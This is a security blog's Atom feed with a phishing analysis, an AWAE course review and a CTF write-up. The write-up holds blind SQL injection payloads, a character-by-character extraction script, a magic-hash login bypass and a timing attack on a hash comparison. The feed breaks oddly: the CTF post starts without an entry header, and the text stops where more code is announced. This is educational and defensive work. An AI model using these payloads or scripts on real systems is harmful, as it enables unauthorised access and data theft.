<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.8.5">Jekyll</generator><link href="http://essentialexploit.com/feed.xml" rel="self" type="application/atom+xml" /><link href="http://essentialexploit.com/" rel="alternate" type="text/html" /><updated>2020-01-09T04:03:05+00:00</updated><id>http://essentialexploit.com/feed.xml</id><title type="html">RabbidByte</title><subtitle>RabbidByte's Random Bytes</subtitle><author><name>RabbidByte</name></author><entry><title type="html">The New Phish</title><link href="http://essentialexploit.com/TheNewPhish.html" rel="alternate" type="text/html" title="The New Phish" /><published>2019-06-06T07:00:00+00:00</published><updated>2019-06-06T07:00:00+00:00</updated><id>http://essentialexploit.com/TheNewPhish</id><content type="html" xml:base="http://essentialexploit.com/TheNewPhish.html">&lt;h2 id=&quot;microsoft-platform-for-phishing--microsoft&quot;&gt;Microsoft platform for Phishing … Microsoft&lt;/h2&gt;

&lt;p&gt;Scams and phishing keep getting more creative, and today I came across a phishing attack that genuinely impressed me.  The lure is a Microsoft-branded login page served from Microsoft's own Azure infrastructure, and it POSTs the entered credentials to a malicious server.  I have not seen anything like this before, so it seemed worth a closer look.&lt;/p&gt;

&lt;p&gt;The attack starts as most do … an email.  The subject line is “Unblock Messages for [email address]” and the email claims that the portal (named after the recipient's email domain) has blocked some emails which the user must release.  The phishing email is not very convincing, as it starts with Dear [username] and finishes with Regards, [domain], among other red flags.  But the URL is where things get quite interesting.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-01.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-01&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The initial hyperlink went to https://[redacted]/some/directory/redirect.aspx?url=https://[redacted].z6.web.core.windows.net/?username=anemailaddress  The attack first uses an open redirect on an unrelated, legitimate website to bounce the user to the lure.  Because the first hop is a trusted domain and the real destination is buried in the url= parameter, URL rewriting and reputation checks applied to the email judge the wrong host, and the user lands on the “payload” page.  That page lives on Azure Storage static website hosting (the web.core.windows.net suffix), so the browser shows a Microsoft-owned domain with a valid Microsoft certificate even though the content belongs to whoever owns the storage account.  The username parameter carries the recipient's address, presumably to pre-fill the form.&lt;/p&gt;
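&lt;p&gt;The detection-side lesson is that a link filter has to unwrap the chain rather than judge the first hostname.  The Python below is an added example written for this page, not code from the original post or from any vendor: it walks URLs nested inside query-string values without touching the network and flags a final destination on Azure Storage static website hosting (the web.core.windows.net suffix the phishing URL used).  The hostnames legit.example and victim-lure are made up.&lt;/p&gt;

```python
from urllib.parse import parse_qsl, urlsplit

# Azure Storage static website hosting: anyone with a storage account gets a
# hostname under this suffix, so the domain says "Microsoft" while the content
# says nothing about who uploaded it.
TENANT_HOSTING_SUFFIXES = (".web.core.windows.net",)


def nested_url(url):
    """Return the first query-string value that is itself an http(s) URL, else None.
    This is how redirect.aspx?url=https://... style open redirects carry the
    real destination; parse_qsl() percent-decodes the value for us."""
    parts = urlsplit(url)
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://")):
            return value
    return None


def unwrap_redirects(url, max_depth=5):
    """Follow nested URLs statically (no requests are sent) and return the chain."""
    chain = [url]
    for _ in range(max_depth):
        inner = nested_url(chain[-1])
        if inner is None:
            break
        chain.append(inner)
    return chain


def analyze(url):
    """Return (chain, findings) for a link lifted from an e-mail."""
    chain = unwrap_redirects(url)
    final = urlsplit(chain[-1])
    findings = []
    if len(chain) > 1:
        findings.append("redirect chain: first hop %s is not the destination"
                        % urlsplit(chain[0]).hostname)
    host = final.hostname or ""
    if host.endswith(TENANT_HOSTING_SUFFIXES):
        findings.append("destination %s is tenant-controlled cloud storage "
                        "on a Microsoft-owned domain" % host)
    if "username" in dict(parse_qsl(final.query)):
        findings.append("destination carries the target's address in the "
                        "query string (pre-filled lure)")
    return chain, findings


if __name__ == "__main__":
    # Constructed sample modelled on the redacted URL in the post.
    sample = ("https://legit.example/some/directory/redirect.aspx"
              "?url=https://victim-lure.z6.web.core.windows.net/?username=user@example.com")
    chain, findings = analyze(sample)
    for hop in chain:
        print("hop: ", hop)
    for finding in findings:
        print("flag:", finding)
```

&lt;p&gt;Run as a script it prints both hops and three flags for the constructed sample.  The point of doing this statically is that a mail gateway can score the real destination before anyone clicks; following the redirect live would also work but tips off the attacker's server.&lt;/p&gt;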

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-02.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-02&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-03.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-03&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The login page is crazy neat!  It looks exactly like the real Microsoft login page, and the address bar backs it up because the host is Microsoft-owned, but the content is served from the attacker's storage account, so whatever it copies from Microsoft the form handling is the attacker's.  The gotcha: during the login process it fires an extra POST that sends the entered username and password to the attacker's server.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-04.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-04&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-05.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-05&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/phish/phish-06.PNG&quot; alt=&quot;alt text&quot; title=&quot;phish-06&quot; /&gt;&lt;/p&gt;</content><author><name>RabbidByte</name></author><summary type="html">Microsoft platform for Phishing … Microsoft</summary></entry><entry><title type="html">Offensive Security AWAE</title><link href="http://essentialexploit.com/AWAE.html" rel="alternate" type="text/html" title="Offensive Security AWAE" /><published>2019-05-05T07:00:00+00:00</published><updated>2019-05-05T07:00:00+00:00</updated><id>http://essentialexploit.com/AWAE</id><content type="html" xml:base="http://essentialexploit.com/AWAE.html">&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;/h2&gt;

&lt;p&gt;A few months ago registration for BlackHat USA19 kicked off, and for the third year in a row I just missed getting into Offensive Security’s Advanced Web Attacks and Exploitation (AWAE) training.  This was frustrating as hell because I only know of it being offered once a year in North America.  The story doesn’t end there though.  A couple weeks after the disappointment I received an email from OffSec offering early access to OffSec Alumni to the online version of the AWAE training before it is publicly available!  Normally I would be shit outta luck because I don’t really have extra cash laying around for stuff like this but I do work for a kick ass employer who took care of the bill!  So it was game on.&lt;/p&gt;

&lt;p&gt;March 9th I received my training material and lab access.  I was not initially impressed, as my last OffSec experience was the PWB training in 2013 and the AWAE lab was much smaller.  Don’t judge a book by its cover I guess, cause the handful of machines in the lab gave me one hell of a good time.&lt;/p&gt;

&lt;p&gt;Layout is similar to the PWK (formerly PWB) training.  You get a PDF textbook, a collection of videos, and access to the lab.  In the lab there is a control panel where you can revert your machines; you will need it cause ya pooch em hard sometimes.  The main difference with the AWAE was the inclusion of a wiki in the lab and access to the applications, machines, and source code.  I was taken aback a bit as I was expecting a blackbox approach to the training but it is completely the opposite.  This training is completely based around the idea of whitebox testing.&lt;/p&gt;

&lt;h2 id=&quot;content&quot;&gt;Content&lt;/h2&gt;

&lt;h3 id=&quot;introduction&quot;&gt;Introduction&lt;/h3&gt;
&lt;p&gt;Completely necessary but dry.  Just like all housekeeping it has to be done and if ignored the student will not get the full experience from the course.  Just read it, pay attention, and take a couple notes of where things are.&lt;/p&gt;

&lt;h3 id=&quot;tools--methodologies&quot;&gt;Tools &amp;amp; Methodologies&lt;/h3&gt;
&lt;p&gt;After reading this I thought that the AWAE was going to be a waste of money.  Isn’t this supposed to be an advanced class?  Ugh, either way they go through Burp Suite, some basic Python with sockets, .NET decompilation, and Java decompilation.  Aside from the .NET stuff none of this was new to me, but you go through it and you may or may not learn something new.&lt;/p&gt;

&lt;h3 id=&quot;atmail-mail-server-appliance-from-xss-to-rce&quot;&gt;Atmail Mail Server Appliance: from XSS to RCE&lt;/h3&gt;
&lt;p&gt;Finally you get to some fun stuff here.  They ease you into the training starting with a basic XSS vulnerability.  Then you start to see what will be the trend in the rest of the material.  Just because you have a vulnerability that you can exploit, don’t stop until you can get RCE.  From the XSS vulnerability multiple examples were given on how to leverage this to further progress deeper into the system.  The best part here was creating a PoC that would chain multiple actions together to make a single XSS turn into RCE.&lt;/p&gt;

&lt;h3 id=&quot;atutor-authentication-bypass-and-rce&quot;&gt;ATutor Authentication Bypass and RCE&lt;/h3&gt;
&lt;p&gt;You can’t have a web attack class without SQLi … this was the first instance, at least it was blind.  The material goes on to touch on input sanitization bypass, data exfiltration, authentication bypass, file upload vulnerabilities, path traversal, and of course getting RCE.  The best part of this module was following the source and seeing why the application worked the way it did.  Oh, and hand crafting the zip payload was just plain old fashioned fun!&lt;/p&gt;

&lt;h3 id=&quot;atutor-lms-type-juggling-vulnerability&quot;&gt;ATutor LMS Type Juggling Vulnerability&lt;/h3&gt;
&lt;p&gt;This is where it got a bit tough for me.  Type juggling was something that I have never done and after this training it has opened up a whole new realm of tests that I will be running.  Not only was the concept of type juggling introduced to me here but also the concept of magic hashes.  Very cool material in this module.&lt;/p&gt;
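&lt;p&gt;For readers who have not met the terms: PHP's loose comparison (==) turns two strings that both look numeric into numbers before comparing them, and a “magic hash” is a digest that happens to look like scientific notation, 0e followed only by digits, which evaluates to zero.  The Python below is an added illustration written for this page, not course material from OffSec: it models PHP's numeric-string rule closely enough to show why a password check written as $stored == md5($input) can be passed with a string whose MD5 is a different magic hash.  The two plaintexts used, 240610708 and QNKCDZO, are the commonly published examples.&lt;/p&gt;

```python
import hashlib
import hmac
import re

# PHP treats a string as numeric when it is an optionally signed decimal with an
# optional exponent; two such strings compare as numbers under ==.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a, b):
    """Model of PHP's string == string comparison (PHP 5, 7 and 8 agree for two
    strings): numeric strings compare as floats, anything else byte-wise."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_hash(digest_hex):
    """0e followed only by digits: PHP reads it as 0 * 10**N, i.e. 0.0."""
    return re.fullmatch(r"0+[eE]\d+", digest_hex) is not None


def vulnerable_check(stored_md5, supplied_password):
    """The pattern the type-juggling module is about, transliterated from
    if ($stored == md5($_POST['password'])) { ... }"""
    return php_loose_eq(stored_md5, md5_hex(supplied_password))


def safe_check(stored_md5, supplied_password):
    """Strict, constant-time comparison (PHP: === or hash_equals())."""
    return hmac.compare_digest(stored_md5, md5_hex(supplied_password))


def find_magic_plaintexts(candidates):
    """Report which candidate strings hash to a magic value."""
    return [c for c in candidates if is_magic_hash(md5_hex(c))]


if __name__ == "__main__":
    stored = md5_hex("QNKCDZO")   # pretend this is admin's real password hash
    print("stored hash:", stored, "magic:", is_magic_hash(stored))
    print("login with 240610708 (loose ==):", vulnerable_check(stored, "240610708"))
    print("login with 240610708 (strict):  ", safe_check(stored, "240610708"))
```

&lt;p&gt;Both MD5 values start with 0e and continue with digits only, so float() turns each into 0.0 and the loose check accepts a password that is not the user's.  The same trick applies wherever a hash or token is compared with ==, which is what makes it worth hunting for in source.&lt;/p&gt;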

&lt;h3 id=&quot;manageengine-applications-manager-sqli-to-rce&quot;&gt;ManageEngine Applications Manager SQLi to RCE&lt;/h3&gt;
&lt;p&gt;I was not looking forward to having to work with Java applications, just because it's unfamiliar to me, but here it was.  The content was exceptional though at helping with understanding Java web applications: source recovery, tracking down how to call which servlets, great coverage of PostgreSQL including user defined functions and large objects, input sanitization bypass, multiple ways to exploit the same vulnerability, and one hell of a challenging “Extra Mile”.&lt;/p&gt;

&lt;h3 id=&quot;bassmaster-nodejs-arbitrary-javascript-injection&quot;&gt;Bassmaster NodeJS Arbitrary JavaScript Injection&lt;/h3&gt;
&lt;p&gt;NodeJS … really?  I wanted to punch my LCD.  More Java and a bastardized version (according to a Java dev I know) at that.  Just more unfamiliar territory for me, but that is what learning is about.  This module went by pretty quick though as I am pretty familiar with RegEx and python.  Then at the end of the material there is a great “Extra Mile” that took me a very long time to finally crack through.  More on the extra mile things below.&lt;/p&gt;

&lt;h3 id=&quot;dotnetnuke-cookie-deserialization-rce&quot;&gt;DotNetNuke Cookie Deserialization RCE&lt;/h3&gt;
&lt;p&gt;Just as soon as I got through all the Java stuff I was uneasy with, they throw .NET at you.  This took me a few read-throughs as I was not familiar with deserialization vulnerabilities, other than hearing about them.  Not to mention I don’t know as much as I should about how a .NET web application works.  This is where the value of the course really started coming out for me.  You spend a good portion of your time in Visual Studio with C# and understanding serialization, thank gawd as I really needed it.  Once you get a handle on serialization the concept of changing the type is introduced with vulnerable code.  Then in true OffSec style you build the payload by hand with really detailed explanations.  Then the extra mile …&lt;/p&gt;

&lt;h2 id=&quot;the-extra-mile&quot;&gt;The Extra Mile&lt;/h2&gt;

&lt;p&gt;Every concept introduced in the training is followed up with exercises that you complete.  Not much different than any other training.  They aren’t hard, the answers are pretty much given to you, and they are there to reinforce the concepts presented.  Then there are what are called “Extra Mile” challenges.  These varied from very “Mickey Mouse” to taking over a week to accomplish.  I will highlight the few that stick out in my mind.&lt;/p&gt;

&lt;h3 id=&quot;type-juggling&quot;&gt;Type juggling&lt;/h3&gt;
&lt;p&gt;This is the first instance in the training where the student is asked to find a vulnerability.  Simple hints of where to look are given but that is it.  As type juggling was new to me this challenge was interesting but far from a hard challenge.  What it did do for me was really drive home the concept of type juggling and improved my ability to follow through code looking for potential vulnerabilities.&lt;/p&gt;

&lt;h3 id=&quot;manageengine-jsp&quot;&gt;ManageEngine JSP&lt;/h3&gt;
&lt;p&gt;This challenge was definitely just that for me, a huge challenge.  I followed many red herrings trying to exploit the system using a JSP payload but time after time it just wouldn’t work.  I ended up finding some other students chatting about this and getting a hint from the conversation.  It then took me a couple days to finally pull the exploit together.  This was a great challenge making the student think of alternative ways of doing things and chaining multiple “steps” together to obtain full RCE.&lt;/p&gt;

&lt;h3 id=&quot;nodejs-jailbreak&quot;&gt;NodeJS Jailbreak&lt;/h3&gt;
&lt;p&gt;How could I forget this one.  It took me over a week to finally crack this bad boy.  Why, most people will ask.  Well let’s just say that even if you have a working exploit and it is coded perfectly the delivery of the payload makes all the difference.  I’m still kicking myself in the ass for this one.  Either way in the end it was really great and I came away with a pretty good understanding of “Context” in NodeJS and how to reach up through the process stack to get what you want.  I am sure that doesn’t make sense to anyone who hasn’t done this challenge.&lt;/p&gt;

&lt;h3 id=&quot;net-deserialization&quot;&gt;.NET Deserialization&lt;/h3&gt;
&lt;p&gt;I was running out of lab time.  I asked my family to give me the weekend to work on this challenge and the final remaining one.  I was able to get through it in just over 10 hours of straight pounding away.  Basically OffSec “introduced” a secondary .NET deserialization vulnerability into DNN.  Yeah that’s basically what you were told, go find it, and exploit it.  Hands down the hardest part for me was finding the vulnerability but detail-oriented people will find the same “clues” that were there to help you.  I’ll tell ya I was jumping around when I finally popped this shell.  What a great challenge!&lt;/p&gt;

&lt;h3 id=&quot;java-deserialization&quot;&gt;Java Deserialization&lt;/h3&gt;
&lt;p&gt;I have this one in here as it was the final challenge in the training and it had an interesting twist.  Although deserialization vulnerabilities were covered it was all done in .NET.  This challenge has you go back to ManageEngine and find the Java Deserialization vulnerability and exploit it.  This was crazy fun and now that the pressure was off of me to complete the training in time I spent hours making a fully automated PoC in python that was multithreaded and handled everything for the attacker.  This was just plain fun and a great way to end the training.&lt;/p&gt;

&lt;h2 id=&quot;where-offensive-security-got-it-right&quot;&gt;Where Offensive Security got it Right&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;The material is very in-depth, and I love how it walks you through the code step by step so you understand why web applications work the way they do.&lt;/li&gt;
  &lt;li&gt;Even though it made me uneasy, the training wouldn’t have been the same without touching every different backend technology: PHP, Java, NodeJS, .NET, and various different database technologies.&lt;/li&gt;
  &lt;li&gt;The “Extra Mile” challenges make this true OffSec training and they make you “Try Harder”.  Once a student accomplishes these challenges they have a feeling of accomplishment and have gone out and studied the technology/vulnerability on their own.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;where-offensive-security-got-it-wrong&quot;&gt;Where Offensive Security got it Wrong&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;I was in the Beta version of this training, so I am sure that the grammar in some of the extra mile challenges will be corrected.  There was confusion on what exactly some of the challenges were asking of the student.&lt;/li&gt;
  &lt;li&gt;At certain points of the training the student is forced to work on a Windows machine in the lab through RDP.  These were slow most times I was on them and I can’t count the number of times I ran out of memory while debugging DNN.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;final-verdict&quot;&gt;Final Verdict&lt;/h2&gt;

&lt;p&gt;Offensive Security training has always been hands down HARD and the absolute best security training I have ever received.  You don’t just read and do exercises.  You are forced to understand the concepts to complete the extra mile.  If any student says that the AWAE training is not worthwhile they are either 1. Way smarter than I am (it doesn’t take much) or 2. They did not attempt the extra mile.&lt;/p&gt;
&lt;img src=&quot;/assets/images/50mCTF/main.png&quot; alt=&quot;alt text&quot; title=&quot;Main Image&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p&gt;So I have never done write-ups for CtF’s before but I am taking the information that I have and putting it all together in some posts.  This post and CtF posts before this date are going to be lacking as I never intended to write them up for a blog, so don’t be surprised when they don’t meet your expectations.&lt;/p&gt;

&lt;h2 id=&quot;summary&quot;&gt;Summary:&lt;/h2&gt;

&lt;h3 id=&quot;discovery-of-the-application&quot;&gt;Discovery of the application:&lt;/h3&gt;
&lt;p&gt;The h1Thermostat application was discovered by extracting the bit.do URL from the image at &lt;a href=&quot;https://pbs.twimg.com/media/D0XoThpW0AE2r8S.png:large&quot;&gt;https://pbs.twimg.com/media/D0XoThpW0AE2r8S.png:large&lt;/a&gt;. The URL &lt;a href=&quot;https://bit.do/h1therm&quot;&gt;https://bit.do/h1therm&lt;/a&gt; then led to a Google Drive where the Android application file (h1thermostat.apk) could be downloaded &lt;a href=&quot;https://drive.google.com/file/d/1u5Mg1xKJMrW4DMGaWtBZ1TJKPdvqCWdJ/view&quot;&gt;https://drive.google.com/file/d/1u5Mg1xKJMrW4DMGaWtBZ1TJKPdvqCWdJ/view&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/50mCTF/png_steg.png&quot; alt=&quot;alt text&quot; title=&quot;Steg&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;disassembly-of-the-apk&quot;&gt;Disassembly of the APK&lt;/h3&gt;
&lt;p&gt;The file h1thermostat.apk was loaded into the Android SDK for analysis. The thermostat application requested a username and password to access the services. The APK code was extracted and it was found that the app would proceed past the login screen whenever the server’s JSON reply contained &quot;success&quot;:true.&lt;/p&gt;

&lt;h3 id=&quot;use-of-defaultweak-administrative-credentials&quot;&gt;Use of default/weak administrative credentials:&lt;/h3&gt;
&lt;p&gt;The thermostat application was loaded into the Android SDK and executed. When the application started it requested a username and password to access the services. The application accepted the credentials:&lt;/p&gt;

&lt;p&gt;Username: admin&lt;/p&gt;

&lt;p&gt;Password: password&lt;/p&gt;

&lt;p&gt;Although some luck is involved in guessing this username and password combination it can easily be automated as there is no rate limiting or account lockout enabled on the application.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/50mCTF/weak_creds.png&quot; alt=&quot;alt text&quot; title=&quot;APK Login&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;sql-injection-vulnerability&quot;&gt;SQL Injection Vulnerability&lt;/h3&gt;
&lt;p&gt;Looking further into the APK code with jadx-gui, the LoginActivity class calls the PayloadRequest class when a user signs in. The username and password are combined with a command field into a login JSON object:&lt;/p&gt;
&lt;div class=&quot;language-json highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;{&quot;password&quot;:&quot;password&quot;, &quot;username&quot;:&quot;admin&quot;, &quot;cmd&quot;:&quot;getTemp&quot;}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;This text string is then encrypted with AES/CBC/PKCS5 and run through a Base64 encoder. Since the client does the encrypting, the key material ships inside the APK, which is what made writing a compatible custom client possible. The server (35.243.186.41) then checks the credentials and replies with an encrypted JSON object:&lt;/p&gt;
&lt;div class=&quot;language-json highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;{&quot;success&quot;:true, &quot;temperature&quot;:73}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;It was found that the &quot;username&quot; field in the JSON object was vulnerable to SQL injection. A custom Java application was written to build a JSON object with the desired fields filled in and parse the server’s response. The injection was blind, so the state of the server-side query had to be inferred from the reply, which takes one of three forms. When the injected condition was true and the query matched a row, success was true. When the injected query was malformed and failed, success was false and the error was “Unknown”. When the query ran but matched 0 rows, success was false and the error was “Invalid username or password”. The three distinct replies give a boolean oracle and, separately, tell you when a payload has broken the query syntax.&lt;/p&gt;

&lt;p&gt;Using the different error messages returned by the server the SQLi vulnerability could be exploited to dump contents from the database. A custom &lt;a href=&quot;https://github.com/RabbidByte/h1heat&quot;&gt;Java application&lt;/a&gt; was written to pull the information out of the database using the following queries with the password of “password”:&lt;/p&gt;
&lt;div class=&quot;language-sql highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;-- payloads for the username field; the password field stays 'password'
-- each '%' pattern becomes '&lt;known prefix&gt;&lt;next guess&gt;%' during extraction
-- MySQL only treats -- as a comment when whitespace follows it (a trailing space or newline)
admin' AND user() LIKE '%';--
admin' AND (database()) LIKE '%';--
admin' AND (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1 OFFSET 1) LIKE '%';--
admin' AND (SELECT column_name FROM information_schema.columns WHERE table_schema=database() AND table_name='users' LIMIT 1 OFFSET 1) LIKE '%';--
admin' AND (SELECT password FROM users LIMIT 1 OFFSET 0) LIKE '%';--
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The Java application would cycle through every printable character until a right answer was found. Once the first character was found the next character would be attacked. This would continue until the end of the string.&lt;/p&gt;
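&lt;p&gt;To make the three-state oracle concrete, here is an added Python example written for this page (the write-up’s own tool was the Java client linked above, and the target was MySQL). It stands up an in-memory SQLite table with the one record found, reconstructs a hypothetical string-concatenated login query so the injection is real rather than simulated, classifies each reply into the three states, and then recovers values one character at a time with LIKE 'prefix%'. The MySQL-specific functions on the page (user(), database(), information_schema) have no SQLite equivalent, so the demonstration extracts the username and password hash instead; a parameterised version of the query shows the fix.&lt;/p&gt;

```python
import hashlib
import sqlite3
import string


def build_db():
    """Constructed stand-in for the thermostat backend: an in-memory SQLite
    database holding the one record the write-up recovered (the CTF ran
    MySQL; the injection mechanics are the same)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', ?)",
               (hashlib.md5(b"password").hexdigest(),))
    return db


def vulnerable_login(db, username, password):
    """Hypothetical reconstruction of the server side: the username is pasted
    into the query, which is what makes the field injectable. The three
    possible replies are the oracle the write-up describes."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT id FROM users WHERE username = '%s' AND password = '%s'"
           % (username, pw_hash))
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return {"success": False, "error": "Unknown"}             # query broke
    if not rows:
        return {"success": False, "error": "Invalid username or password"}  # ran, 0 rows
    return {"success": True, "temperature": 73}                    # ran, row matched


def safe_login(db, username, password):
    """Same check with bound parameters; the payloads below stop working."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    rows = db.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                      (username, pw_hash)).fetchall()
    if not rows:
        return {"success": False, "error": "Invalid username or password"}
    return {"success": True, "temperature": 73}


def oracle(db, condition):
    """True iff the injected boolean condition held. The comment (-- ) discards
    the rest of the original WHERE clause; MySQL needs the trailing space."""
    return vulnerable_login(db, "admin' AND (%s) -- " % condition, "password")["success"]


# LIKE is case-insensitive in SQLite and in MySQL's default collations, so case
# is not recovered here; finish with '=' (or BINARY in MySQL) if it matters.
CHARSET = string.digits + string.ascii_lowercase


def extract(db, expr, max_len=64):
    """Recover the value of a scalar SQL expression one character at a time,
    the way the write-up's Java client did with LIKE 'prefix%'."""
    known = ""
    for _ in range(max_len):
        for c in CHARSET:
            if oracle(db, "%s LIKE '%s%s%%'" % (expr, known, c)):
                known += c
                break
        else:
            break   # nothing matched: end of string (or a char outside CHARSET)
    return known


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_login(db, "admin'", "password"))        # syntax error -> Unknown
    print(vulnerable_login(db, "nobody", "password"))        # 0 rows -> Invalid ...
    print("username:", extract(db, "(SELECT username FROM users LIMIT 1 OFFSET 0)"))
    print("password:", extract(db, "(SELECT password FROM users LIMIT 1 OFFSET 0)"))
```

&lt;p&gt;The “Unknown” state is useful in its own right while building payloads: a reply of “Invalid username or password” means the query parsed and you only got the logic wrong, while “Unknown” means the quoting broke. The extraction costs at most one request per candidate character per position, which is why the write-up’s run against a real server took a while.&lt;/p&gt;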

&lt;p&gt;&lt;img src=&quot;/assets/images/50mCTF/sqli.png&quot; alt=&quot;alt text&quot; title=&quot;SQLi&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;information-disclosure&quot;&gt;Information Disclosure:&lt;/h3&gt;
&lt;p&gt;The users table holds a single record: id 1, username admin, and password 5f4dcc3b5aa765d61d8327deb882cf99, which is the unsalted MD5 hash of the word “password”. Had there been more accounts in the table, unsalted MD5 hashes like this could easily be cracked with wordlists or precomputed tables.&lt;/p&gt;

&lt;p&gt;Once the devices table was dumped, every IP address in it except the record with id 85 fell within reserved or special-purpose blocks that are not routable on the public Internet:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;10.0.0.0–10.255.255.255&lt;/li&gt;
  &lt;li&gt;100.64.0.0–100.127.255.255&lt;/li&gt;
  &lt;li&gt;127.0.0.0–127.255.255.255&lt;/li&gt;
  &lt;li&gt;169.254.0.0–169.254.255.255&lt;/li&gt;
  &lt;li&gt;172.16.0.0–172.31.255.255&lt;/li&gt;
  &lt;li&gt;192.0.0.0–192.0.0.255&lt;/li&gt;
  &lt;li&gt;192.0.2.0–192.0.2.255&lt;/li&gt;
  &lt;li&gt;192.88.99.0–192.88.99.255&lt;/li&gt;
  &lt;li&gt;192.168.0.0–192.168.255.255&lt;/li&gt;
  &lt;li&gt;198.18.0.0–198.19.255.255&lt;/li&gt;
  &lt;li&gt;198.51.100.0–198.51.100.255&lt;/li&gt;
  &lt;li&gt;203.0.113.0–203.0.113.255&lt;/li&gt;
  &lt;li&gt;224.0.0.0–239.255.255.255&lt;/li&gt;
  &lt;li&gt;240.0.0.0–255.255.255.254&lt;/li&gt;
  &lt;li&gt;255.255.255.255&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The record with the id “85” in the devices table had an IP address of 104.196.12.98. This was the only accessible IP address in the table. When the address was visited with a web browser it displayed an administrative login page for “FliteThermostat”.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;shitty image from cellphone, sorry.&lt;/em&gt;
&lt;img src=&quot;/assets/images/50mCTF/login.jpg&quot; alt=&quot;alt text&quot; title=&quot;login&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;timing-attack&quot;&gt;Timing Attack:&lt;/h3&gt;

&lt;p&gt;The JavaScript that sends the username and password from the web page to the server takes the user-entered values and joins them with the bytes ‘\x05\x00\x06’ between the two. The resulting string is run through a custom “hashing” function and sent off to the server for authentication.&lt;/p&gt;

&lt;p&gt;Running a dictionary-style attack showed that some responses from the server were noticeably slower than others. That is the signature of a comparison that stops at the first mismatching byte: the more of the submitted hash matches the stored one, the longer the server takes to reject it, so the hash could be recovered with a timing attack (with a helpful push in the right direction by 0xc0ffee).&lt;/p&gt;

&lt;p&gt;The hash was recovered one byte (two hexadecimal characters) at a time by observing response times. Starting from a string of 64 “0”s, each position was tried with all 256 possible byte values; the longer the server took to respond, the more likely those two characters were the next ones in the string. Once all 256 candidates had been sent, the 10 to 15 slowest were replayed to weed out false positives, and when one of them reproduced the same longer response time the process moved on to the next byte.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/images/50mCTF/hash.png&quot; alt=&quot;alt text&quot; title=&quot;BURP&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The best results came from a virtual machine replaying the POST with Burp, although it was very slow: a single thread with a 25 millisecond throttle. Once again this could be made much harder by adding rate limiting or account lockout to the system, and closed entirely by comparing the hashes in constant time. The recovered hash:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;f9865a4952a4f5d74b43f3558fed6a0225c6877fba60a250bcbde753f5db13d8
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
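&lt;p&gt;As an added example (not the write-up’s tooling, which was Burp), the Python below reproduces the byte-at-a-time timing attack against a constructed stand-in for the login check. The stand-in compares the submitted hash with the stored one and stops at the first mismatch, and it models elapsed time as one unit per byte compared plus jitter instead of measuring real latency, so the recovery runs offline and deterministically; against a real target each probe is a throttled HTTP POST and far more replays are needed. The hidden value is the hash recovered above. A second stand-in using a constant-time comparison shows why the same attack then fails.&lt;/p&gt;

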